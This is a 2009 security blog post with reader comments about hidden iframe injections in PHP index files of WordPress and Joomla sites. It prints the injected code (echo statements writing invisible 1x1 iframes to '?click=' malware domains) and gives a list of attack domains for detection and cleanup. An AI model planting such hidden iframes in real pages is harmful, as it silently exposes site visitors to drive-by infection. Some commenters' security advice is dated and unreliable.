msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Another Type of IFrame Hack (PHP Exploit)

   29 Apr 09   Filed in Website exploits

This is a quick post about yet another type of hidden iframes injected into legitimate web pages.

The HTML code may look like this:

<iframe src="http:// xtrarobotz .com/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Domain names may vary, and the number of different iframes injected into a single web page may be different. The distinguishing feature of this exploit is the “?click=<hex_number>” part of the URL, where <hex_number> is some hexadecimal number.

PHP code

Unlike other exploits that simply inject HTML code, in this case you may find these iframes injected as PHP code. Usually only in index.php files. Here are the code snippets I encountered in Joomla and WordPress files.

WordPress
<?php
define('WP_USE_THEMES', true);
require('./blog/wp-blog-header.php');
echo "<iframe src=\"http:// xtrarobotz . com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http:// nipkelo .net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http:// internetcountercheck . com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>

Joomla
//
// Generate the page
//
$template->pparse('body');
include($phpbb_root_path . 'includes/page_tail.'.$phpEx);
echo "<iframe src=\"http:// sefauro . net/?click=1B47575\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>

Malicious Domains

Most malicious domains used in this attack, are blacklisted by Google. And if your site is infected it may also be blacklisted. The Safe Browsing diagnostic page in this case will say something like:

“Malicious software is hosted on 1 domain(s), including xtrarobotz.com/.”

Here is the list of known attack domains. Most of them have the same IP address: 86 .120 .92 .220. The rest are currently inaccessible (must have been shut down).

  • xtrarobotz .com
  • goooogleadsence .biz
  • internetcountercheck .com
  • google-ana1yticz .com
  • live-counter .net
  • nipkelo .net
  • hosttracker .net
  • durnosy .com
  • ibalefo .net
  • nyoflak .com
  • peskostruikaz .com
  • bukirda .com
  • thedeadpit .com
  • sefauro .net
  • vafuiek .com
  • deisvop .net (Added: April 30, 2009)
  • webexperience13 .com (Added: April 30, 2009)
  • beidzan .com (Added: May 02, 2009)
  • klaomta .com (Added: May 02, 2009)
  • quoasty .com (Added: May 07, 2009)
  • niklejo .net (Added: May 07, 2009)
  • ruisjop .com (Added: May 07, 2009)
  • nakulpi .net (Added: May 07, 2009)
  • clifedo .net (Added: May 07, 2009)
  • neglite .com (Added: May 12, 2009)

Cleaning up

Two types of hidden iframes on the same site

Many times I’ve seen these iframes on the same sites as the .cn “income” iframes I blogged about two weeks ago. As you can see on the screenshot, they can be easily detected by Unmask Parasites (both types of hidden iframes).

I assume this exploit uses the same infection technique. And I hope the clean up instructions in that post will help to get rid of these iframes too.

If you have more information about this exploit, want to share your experience, or have a question, please leave a comment below.

Similar posts:

Reader's Comments (36)

  1. |

    Hi.
    I have gotten this but with the iframes from previuous post.
    It is in basically EVERY index file. WordPress( + templates etc…), mediawiki. Even the album that I created in photoshop.

    Can you tell me more about HOW they do this? So I can prevent it.
    I don’t wanna get this again.

    • |

      The other post speculates about how they do it and how to stop it.

      Sipmply put, prevent your passwords from being stolen and then change passwords and upload a clean copy of infected web pages.

  2. |

    my website is infected to
    what can i do

  3. |

    I found this virus 10 days ago and 4th of my customers got it .

    We removed it more than 10 times but the next day amazingly it was on all pages again .

    I found the source file .

    I each “Images” folder in your site it will copy a php file “image.php” .

    Before removing the script from pages , you must rewrite a same file instead of image.php and change the permissions .

    Then remove the scripts .

    If your site gets the iframe version as fast as you can , you must remove the iframe then replace the image.php .

    Because google may consider your site as a harmful site .

    A good news is that .asp files won’t get this virus .

    Another thing is that , in cms sites i changes the permissions of template folders !!!

  4. |

    Hello Denis. First of all thanks for you post and for providing a forum to discuss this serious issue.

    Since yesterday my website got infected with this too. I downloaded all the files from the server and searched for the iframe malware and around 60 index.html files were infected.

    How do I fix it? Do I just delete the iframe code from the html files and upload the corrected files back on the server?

    Also is there any software that I can use to scan the files on the server for such malwares.

    Any other tips for removing such malwares?

    Thanks again!

  5. |

    My site fell victim to this as well. All this week I have been trying to fight a virus on my machine and ended up saying f’it. Had to wipe my machine tonight.

    I noticed that you all have said just your index files fell victim. Sadly every html/php file on my site fell victim. I am in the process of going through and uploading what backups I have.

    My hell started when I was looking up how to get a certain font into sIFR. My search came across bit monster. Next thing I know AVG went off and all hell broke loose. Stay away from bit monster and don’t be an idiot like I was and click on a site that you have no idea what it is.

    I am in the process of writing a script to erase the havoc off of my site. If anyone wants me to post the script when I’m done with it let me know and I’ll try and get it up.

    • |

      If the script can be used without much customization and well commented (what it does and how it works), I can post it here (with due credits)

    • |

      Hello everybody,

      Thanks Denis for providing this blog in order to discuss about this bad virus.

      Arowland, I will be very intested by the script and can provide it for other persons on my web site with the due credits to in the security section.

      I have been infected the first day during my holidays, many stress for holidays, I’m impressed about how many persons have nothing to do for doing only bad things.

      Many thanks for all kind of informations provided here, and if you can share the script when it will be ready it will be very apreciated.

  6. |

    you can use Dreamwever to clear up you code using expression search and replace

  7. |

    Just cleaned this up off a zencart site hosted on bluehost. Fortunately had a backup that’s only a few days old, but am very worried about the possibility for a repeat attack. Changing authentication everywhere after checking my machine, but otherwise have no idea how the offending IP got in. Is there a range of IPS I can block?

  8. |

    Well, isn’t that just a pisser! I had to take my site down today too.

    The funny thing is, I have been developing for almost 20 years, and you get an instinct about things after that long. Well my webmaster didn’t want to use ASP, He wanted to use PHP. I really didn’t want to use PHP because ASP VB Developers are a dime a dozen, so if I needed to I could Have someone working on the site in a short time. But I relented and now I am here! Blacklisted by google and developing a bad name really fast…Great!

    Anyways My question is, what is being done to find these people, I would seriously like to find the person who did this and shoot them in the head. Well not really, I want to torture them first..Like beat them to death with a PHP book or something..

  9. |

    Hi!

    Some of our sites was hacked recently. It put some extra code (iframe) into many index*.php, index*.html and default*.php files that it found (not all, maybe because there were too much of them and it stopped attack after some period of time).

    One of our teammates within project had his laptop virused (bad that we didn’t note what virus was that). We repaired this issue, but before that he stored and used ftp login information for a day or two on that infected machine.

    I think it can work in one of two ways (which one it is – I don’t know:

    1)
    - you have machine infected with some virus/trojan
    - virus steals your login and password to ftp
    - virus sends it to it’s owners
    - they use some kind of bot and update index files on your ftp

    2)
    - you have machine infected with some virus/trojan
    - virus gets your login and password to ftp
    - virus logs in into ftp and updates index files on your ftp

    How do we remove it?
    - We replace all infected files that have modification date of the attack time with uninfected copies.
    - We change passwords to our ftp site.
    - We check file permissions.

  10. |

    Actualmente nuestra pagina tiene los virus ya mencionados estan alojados en los archivos php y html y encontre uno en js, tambien he visto que ha creado unos archivos php y html con una advertencia de que no se elimine pues la unica posible solucion q veo es dejar fuera de servicio la pagina “para no aparecer en la lista negra de google” eliminar el virus en todos los archivos infectados en mi caso fueron 2000 archivos aprox y los elimine rapidamente con dreamweaver ya q se puede buscar el codigo expecifico en cada uno de los archivos infectados y despues haber cambiado todas las contraseñas con caracteres expeciales para mayor seguridad se pone a rodar nuevamente.
    espero encuentren una solucion mas secilla ya que esto abure un poquito pero todo sea para poner en marcha nuestras paginas web

  11. |

    murago .su is another one i found yesterday after it hacked one of my sites, luckily got to it before google found it

  12. |

    Hi,

    :(
    Just discovered today that my WordPress 2.7.1 site has been hacked with the same header iframe attack you are discussing here, but with the iframe source coming from worldnamebuy.cn.

    I thought I might mention the last thing that I did on my site prior to this occurring was delete 4 spam comments from my WordPress admin panel, which Akismet caught, but they got past Bad Behavior.

    Prior to that occurring I had upgraded my Bad Behavior software from within the plugin admin panel of WordPress. However, after the fact I later read that it would have been better to upgrade Bad Bahavior from my ftp rather than from the WordPress admin panel.

    Don’t know if that created a greater vulnerability or not, but thought I would mention in hopes it may help someone here.

    Thank you for this information here! Hopefully I’ll get my site corrected before Google’s robots cruise by again. Don’t want to get black-listed!

  13. |

    My friends sites are affected by this hack. it injects iframe in every index.php file. His PC got infected by some virus on the same day and steal the ftp passwords.

    we immediately detected this and changed the ftp details from some other machine and restore the files from the backup.

    so keep your ftp details safe.

  14. |

    This post is a bit misleading calling this a “PHP Exploit” without explaining how this code is appended via a PHP vulnerability. It sounds as if, from reading the post, the hack is through somehow “injecting” the iframe into the files through some undefined vulnerability in PHP. However I dont see any explanation for this.

    Rather, it seems most likely that it is not a “PHP Exploit” but simply stolen ftp information and the hack is run by a remote program that simply does a reg ex search on all files like “index.php”, “default.php”, “home.php” and maybe other patterns and simply opens the files, writes the iframe to it inside or after the body tags of the found files. Just because the sites are in php just seems to be an arbitrary target of the hackers.

    I’m guessing that the ftp credentials are obtained on computers with some kind of infected software, maybe even cracked ftp programs from file sharing, and simply added to a long list of stolen ftp credentials.

    So far I have dealt with this on two sites and simply changing the ftp credentials has been enough to suspend a return. However, that doesnt mean that the same info can’t be obtained again with compromised machines.

    In both cases I have seen, I suspect the clients who asked for ftp credentials have infected computers. Once you give out your ftp info you can only go so far to protect it.

  15. |

    I’ve found this exploit in both index.html and index.php files, but not containing “clicks=”. Here’s an example:

    For the series of websites we manage, we found 443 occurrences. As of this date, we’ve gotten rid of them all, and hope not to see them return, but are being watchful. These sites run on a remote Plesk/Linux box, so Dreamweaver search/replace wasn’t a good option. Here’s the README for the procedure, followed by the two little scripts that I used. This is not documented well, and definitely not bulletproof, so use with caution (and back up the site before you start). Note that our Plesk stores all its sites in /var/www/vhosts – your sites are probably in some other location. If you want to use this stuff, you’ll need some familiarity with *ix shell programming and the tools that go with it (I used sed and awk).

    README:

    Getting rid of exploits in a semi-automated manner:

    cd /var/www/vhosts, and run:
    fgrep -HR \/tmp/filelist.txt

    Generates a file which lists the names of all files that have tags,
    with the filename first, followed by a :, and then the line containing
    the offending tag.
    Look at the file with:
    less /tmp/filelist.txt

    Eliminate innocuous website references by running fgrep multiple times, with
    multiple output files:

    fgrep -v maps.google.com /tmp/fl1.txt

    Check what’s left and look at which websites are infected, using:
    less /tmp/fl2.txt [or whatever number]

    If there are problems, you’ll see lines like:
    ./[somedomain].com/httpdocs/IntegratedMLMFormula/index.html:

    A good quick check is also available (but not exhaustive) by simply using fgrep:
    fgrep .cn /tmp/fl2.txt

    Extract all the lines having to do with a particular website by:
    fgrep /tmp/websitedomainbadiframe.txt

    Insert the full path in each line of the file:
    sed ‘s|^.|/var/www/vhosts| /tmp/websitedomainb
    adiframefullpath.txt

    Edit second line remove.sh script to use the correct filename (the one with the
    list of files we generated above – websitedomainbadiframefullpath.txt

    Run it.

    REMOVE.SH script:
    #!/bin/bash
    myfile=”/tmp/inbusfullpathbadiframe.txt”
    myline=”"
    while [ 1 ]
    do
    read myline || break
    filename=`echo $myline | cut -d: -f1`
    echo $filename
    awk -f remove.awk $filename >$filename+
    mv -f $filename+ $filename
    done < $myfile

    REMOVE.AWK script:
    BEGIN {
    proc_count = 0;
    }
    {
    start = index($0, “”);
    if (start == 0)
    print $0;
    else
    {
    keepleft = substr($0, 1, start-1);
    if ($0 ~ /\/iframe>$/)
    keepright = “”;
    else
    keepright = substr($0, end + 8);
    print keepleft keepright;
    proc_count += 1;
    }
    }
    END {
    }

  16. |

    This week one of the sites I work on was hacked and an iframe was placed in all index.php files, plus in the functions.php file in the wp-includes folder.

    The specfic hack code is:

    This code often overwrites the ending php tags in the file and thus brings the site down.

    I have seen a couple of other threads on this (links at bottom), but not exactly the same code example, so wanted to bring it to light here to:

    * Gauge how often it’s happening
    * Share solutions
    * Expose the culprits, if possible
    * Alert WP team so they can review possible core level security measures

    As to remedies and security measures to take, the other threads have given some good advise, and I plan to sweep my machine and those of other team members with FTP access (could be virus attached to our systems), check recent plugins, scan for virus’ on the hosting servers, and change all relevant security codes and settings. I will report again here, and encourage you to do same.

    For permanent solution read more @ http://annanta.com/?p=338

  17. |

    From a comment on the same topic at: http://wordpress.org/support/topic/261886

    This is a FTP password compromise.

    Not related to WordPress.

    Make sure to upgrade your Adobe Reader to the lastest version. You probably have Adobe Reader 8.0 and using FileZilla.

    I had just installed and used latest version of FileZilla few days ago… So this rang a bell, although I was running Adobe Reader 9.0 (not 8.0). Nevertheless, I opened adobe reader 9, and run the updater, and now I get:
    “The Adobe Reader 9.1.2 Update addresses customer issues and security vulnerabilities. Adobe recommends that you always install the latest updates.”
    oops…

    Updating adobe reader, and changing ftp password… hope that resolves the issue… I’m also re-doing a full scan of my local computer again… *so embarrassing*

    • |

      Listen folks, for you games, keep windows. For work, use Linux or OS X. And for the love of God, do NOT use Adobe Acrobat reader. It has a worse track record then Fat Albert. If you must use windows use Sumatra PDF or FoxIt pdf, which both have a far better security record when it comes to PDF exploits.

  18. |

    hello all,
    i read all the comments on this page because my site has also one of the infected like your with iframe injections.
    But I have got some other solution for my site to keep away from the viruses. I have embed some javascript code which remove the iframe from my index pages with onload or init() time of my page.
    and it works fine
    if some one else also have any good solution for removing this virus attack (IFrame Attack) then please also share with me…
    thanks you all

    • |

      It’s good that you care about your site visitors. However I would be also concerned about the fact the your local computer is infected and that criminals have access to your site and can modify it the way they want.

  19. |

    Hi web owners,

    I had that cn. Aka Gumblar on a couple of websites 3 weeks ago.

    This one looks like it’s about the same.. but im a security noob so maybe there are some big differences.

    Solution for gumblar is:

    Scan your pc with http://malwarebytes.org/

    Then fix your FTP passwords, don’t save them in any program and delete all the malicious code in de /index.php / html.

    Note: make sure your the only one who’s able to connect to the FTP.

  20. |

    I came across the iframe scripts on two of my websites in the past month. What don’t understand “call me retarded” but why do they do this? or what is the script suppose to do?
    The two that I came across were already blocked by google so I have not witnessed it in execution. Might I add, I am a freshmen to this invasion so this is a learning curve for me.

    • |

      The scripts use browser vulnerabilities to silently infect visitors’ computers with all sorts of malicious programs that steal personal (and financial) information, send spam from infected computers, hack other legitimate web sites and do all other illegal staff. It’s a multimillion dollar “business”.

      • |

        Technically that is incorrect,
        ActiveX scripting is used to exploit (Blame Microsft, Why oh why do they assume every ActiveX scripting call is safe? :sigh:)

        Simple answer to internet users. Ditch Internet Explorer (if you use it) and goto Firefox, Install the No/Script add-on. Now you have control over scripting and nothing can exploit you via your browser!

  21. |

    Hi

    I had the same problem and I write two scripts to fix my site automatically.

    I posted the solution and the script I used, the solution is here:

    http://oscarif.wordpress.com/2009/08/04/eliminacion-automatica-de-iframe-oculto/

    Unfortunatelly that post is in Spanish because my English is not good, but if someone wants to help me or wants to translate it to English, I’ll try to explain for a good translation.

    I hope my solution works fine and everyone can fix his site.

  22. |

    If your system is completely free of viruses and spyware (I use a firewall and used four different scanners including a rootkit scanner)…

    If you change your FTP passwords often…

    If you have deleted your website and uploaded a clean version of all your files…

    But you are still being hit by iframe injections…

    Chances are you are not using Secure FTP because you either didn’t know it existed or your host doesn’t provide it. This is exactly what happened to me. All of the helpful websites that provide information about iframe injections blame viruses, trojans or insecure passwords, and most do not point to another obvious solution. GO WITH A GOOD HOST that provides secure FTP and the option to use mod_security automatically on your domain panel. I switched to DreamHost, immediately switched ON Secure FTP, switched OFF regular FTP, and switched on extra security, and the attacks have finally stopped.

    IXWebHosting was of no help and was the cause of my problem. Even after I blocked all other IP addresses than mine to FTP, I continued to get hacked. I suspect that the problem was due to insecure FTP (password easily sniffed during transmission) and insecure hosting (hacker able to access my site even though they were disallowed from FTPing to it).

    When all else fails – do some really good research and change hosts.

  23. |

    Hello,
    I suffered from the same. I’m copying my M.O. here, which worked.
    I got
    /homepages/4/d134610354/htdocs/moebius77/blog2/wp-includes/default-widgets.php on line 423 as an error on my blog. No way to login or other. So:
    1) re-install all your WordPress blog, FTP it onto the server again, EXCEPT the WP-Content folder if you want to keep your images and themes.
    2) Now you should be able to login. Go to your dashboard and install plugin “Script Exploiter”.
    3) Run the plugin and look for malicious script. In my case, I had this baby:

    copied on most of my install.php files, on all the themes (default, etc.), on the plugins and others.
    4) Download the files with the added script, open them with an editor and erase all the garbage.
    5) FTP them back on the server, change your password, you should be all right.
    Cheers, hope this helps,
    Vinz

  24. |

    [...] http://blog.unmaskparasites.com/2009/04/29/another-type-of-iframe-hack-php-exploit/ http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/ [...]

  25. |

    We have removed the script. The site was uploaded with IP Address and domain was pointed a day after . Now If I am using search by name its absolutely fine but other pages are still showing with IP which were crawled when domain was not pointed.

    However , at some places its showing okay. I am not sure..

    Does it takes some time ?